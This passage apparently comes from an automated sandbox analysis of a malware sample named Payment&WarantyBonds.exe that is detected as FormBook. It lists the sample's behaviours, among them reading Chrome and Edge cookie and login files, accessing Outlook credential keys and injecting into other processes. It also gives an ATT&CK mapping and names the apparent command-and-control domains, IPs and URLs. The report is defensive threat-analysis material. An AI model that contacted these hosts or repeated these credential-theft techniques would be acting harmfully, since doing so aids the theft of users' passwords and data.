                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4148413603.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2063986251.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4148359872.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4150364860.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4148377228.0000000002EC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2064136057.00000000021E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\systeminfo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4148413603.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2063986251.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4148359872.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4150364860.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4148377228.0000000002EC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2064136057.00000000021E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials114
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545186 Sample: Payment&WarantyBonds.bat Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 31 www.xipowerplay.xyz 2->31 33 www.091210.xyz 2->33 35 17 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected FormBook 2->49 53 5 other signatures 2->53 10 Payment&WarantyBonds.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 33->51 process4 file5 29 C:\Users\...\Payment&WarantyBonds.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 Payment&WarantyBonds.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 oDnyHukDVUZk.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 systeminfo.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 oDnyHukDVUZk.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.cotti.club 103.120.80.111, 49794, 49810, 49826 WEST263GO-HKWest263InternationalLimitedHK Hong Kong 23->37 39 www.simplek.top 203.161.49.193, 50036, 50037, 50038 VNPT-AS-VNVNPTCorpVN Malaysia 23->39 41 12 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Payment&WarantyBonds.exe24%ReversingLabsWin32.Trojan.Sonbokli
                Payment&WarantyBonds.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                http://www.fontbureau.com/designersG0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                http://www.fontbureau.com/designers/?0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.fontbureau.com/designers?0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                http://www.fontbureau.com/designers0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.fonts.com0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.fontbureau.com0%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.fontbureau.com/designers80%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.cotti.club
                		103.120.80.111
                		truetrue
                  		unknown
                  www.sgland06.online
                  		34.92.128.59
                  		truefalse
                    		unknown
                    solarand.online
                    		217.160.0.60
                    		truetrue
                      		unknown
                      www.simplek.top
                      		203.161.49.193
                      		truetrue
                        		unknown
                        extrime1.shop
                        		152.42.255.48
                        		truetrue
                          		unknown
                          www.cesach.net
                          		217.76.156.252
                          		truetrue
                            		unknown
                            basicreviews.online
                            		144.76.190.39
                            		truetrue
                              		unknown
                              www.091210.xyz
                              		172.67.154.67
                              		truetrue
                                		unknown
                                www.adsa6c.top
                                		20.2.249.7
                                		truetrue
                                  		unknown
                                  www.297676.com
                                  		199.59.243.227
                                  		truetrue
                                    		unknown
                                    www.xipowerplay.xyz
                                    		13.248.169.48
                                    		truetrue
                                      		unknown
                                      www.030002059.xyz
                                      		161.97.142.144
                                      		truetrue
                                        		unknown
                                        iampinky.info
                                        		3.33.130.190
                                        		truetrue
                                          		unknown
                                          stationseek.online
                                          		198.251.84.200
                                          		truetrue
                                            		unknown
                                            www.solarand.online
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.extrime1.shop
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.stationseek.online
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.iampinky.info
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.basicreviews.online
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.030002059.xyz/2sun/?ZT=HFv57CWzV4D1L9ubGrUw/N+LZZ6BniYLjcS4cRbGENzhA3BKZjtgqnC6wzdpxcsL4M445YXmdmOqKzt/9+uXSXCfKbs+tX0lmfcjUf3N9oWc/wvfMeYS2jQ=&mTkD=Gj2Ti2T0g4true
                                                        		unknown
                                                        http://www.extrime1.shop/jr4j/true
                                                          		unknown
                                                          http://www.xipowerplay.xyz/akxn/true
                                                            		unknown
                                                            http://www.xipowerplay.xyz/akxn/?ZT=bVCpbCQOZK8RJSSOpbtjW6178FykoGhXFODVqYypnT+nS+pakzyDZ3G2gJzbbKB5bmDBooJSbxoFgw5n88RQ4gN+spy4B3V2SPR8yfMM1NLM4EIxe0ofqks=&mTkD=Gj2Ti2T0g4true
                                                              		unknown
                                                              http://www.091210.xyz/jwed/true
                                                                		unknown
                                                                http://www.adsa6c.top/wr26/true
                                                                  		unknown
                                                                  http://www.cotti.club/3ej6/?ZT=Gf4n60vPMxeL0A+d5GBWdueSYaV7AAF6sYlT7O2otcMNGwtil4ITBlU9iT/EVO+vtwlhWFB1C/mfTw8URcWhMQgTObTwj1m/ib0JAzzbicsZX3cTLGstzzo=&mTkD=Gj2Ti2T0g4true
                                                                    		unknown
                                                                    http://www.sgland06.online/33ib/?ZT=AYOfApeu9cghctp2i/KTSy5LkW4tz9x7+arej5d+r0NkQieZykYOddwLhoh5ni50J8Z5WiAS8Adn1ZwJ2laV/jmSd394ohUQohZCg1IJ+kicD56x/bghldI=&mTkD=Gj2Ti2T0g4false
                                                                      		unknown
                                                                      http://www.cotti.club/3ej6/true
                                                                        		unknown
                                                                        http://www.030002059.xyz/2sun/true
                                                                          		unknown
                                                                          http://www.cesach.net/dma3/?mTkD=Gj2Ti2T0g4&ZT=IhPPRAmDChEnx8G5Mk3wYKJVvliqClSy7lT3/i9hniKwN2WP3nmtzIAyaYX2MoR3jQRU/NaT7iTCvd3O/fPSuEFMVnQWNGAOAVxjgpJaGw2AUh+P10Czoew=true
                                                                            		unknown
                                                                            http://www.basicreviews.online/3xn5/true
                                                                              		unknown
                                                                              http://www.solarand.online/diem/?mTkD=Gj2Ti2T0g4&ZT=6kQoSQEqBTKFeIgPWItcwMtJ6+nSmUORx6o6L7StlLAM0wJa+kMHFj5rDbCqKJO5phAeVuacSteB2VMr/yCaTx+wFCn7HbSrd9uZdvfw4QtNwXqKd1ZsMRg=true
                                                                                		unknown
                                                                                http://www.091210.xyz/jwed/?ZT=BP+RnxL4kRmCbJis2H94uci3abF0xOX/uWRdW7IS0nQn3eBqrLGhokpRAgB0njlljCrnZN3jlOJi4UAaeIXlep/T+OgRPR3ifAipJWCHkORcjZ0KtUFfU2c=&mTkD=Gj2Ti2T0g4true
                                                                                  		unknown
                                                                                  http://www.297676.com/xyex/true
                                                                                    		unknown
                                                                                    http://www.iampinky.info/nhtq/?ZT=0+mU6fX4mGgH3aI4KvnZ0Dnt9NN9uhfQ4WQLoO9YJQq1rLkiV3mWe/ShpiWb6GRwN8XKSHyyPlz1ODC2MK0vYsx4EzdsG0j0QesGBnWjRvygBOdKdkC21k4=&mTkD=Gj2Ti2T0g4true
                                                                                      		unknown
                                                                                      http://www.solarand.online/diem/true
                                                                                        		unknown
                                                                                        http://www.sgland06.online/33ib/false
                                                                                          		unknown
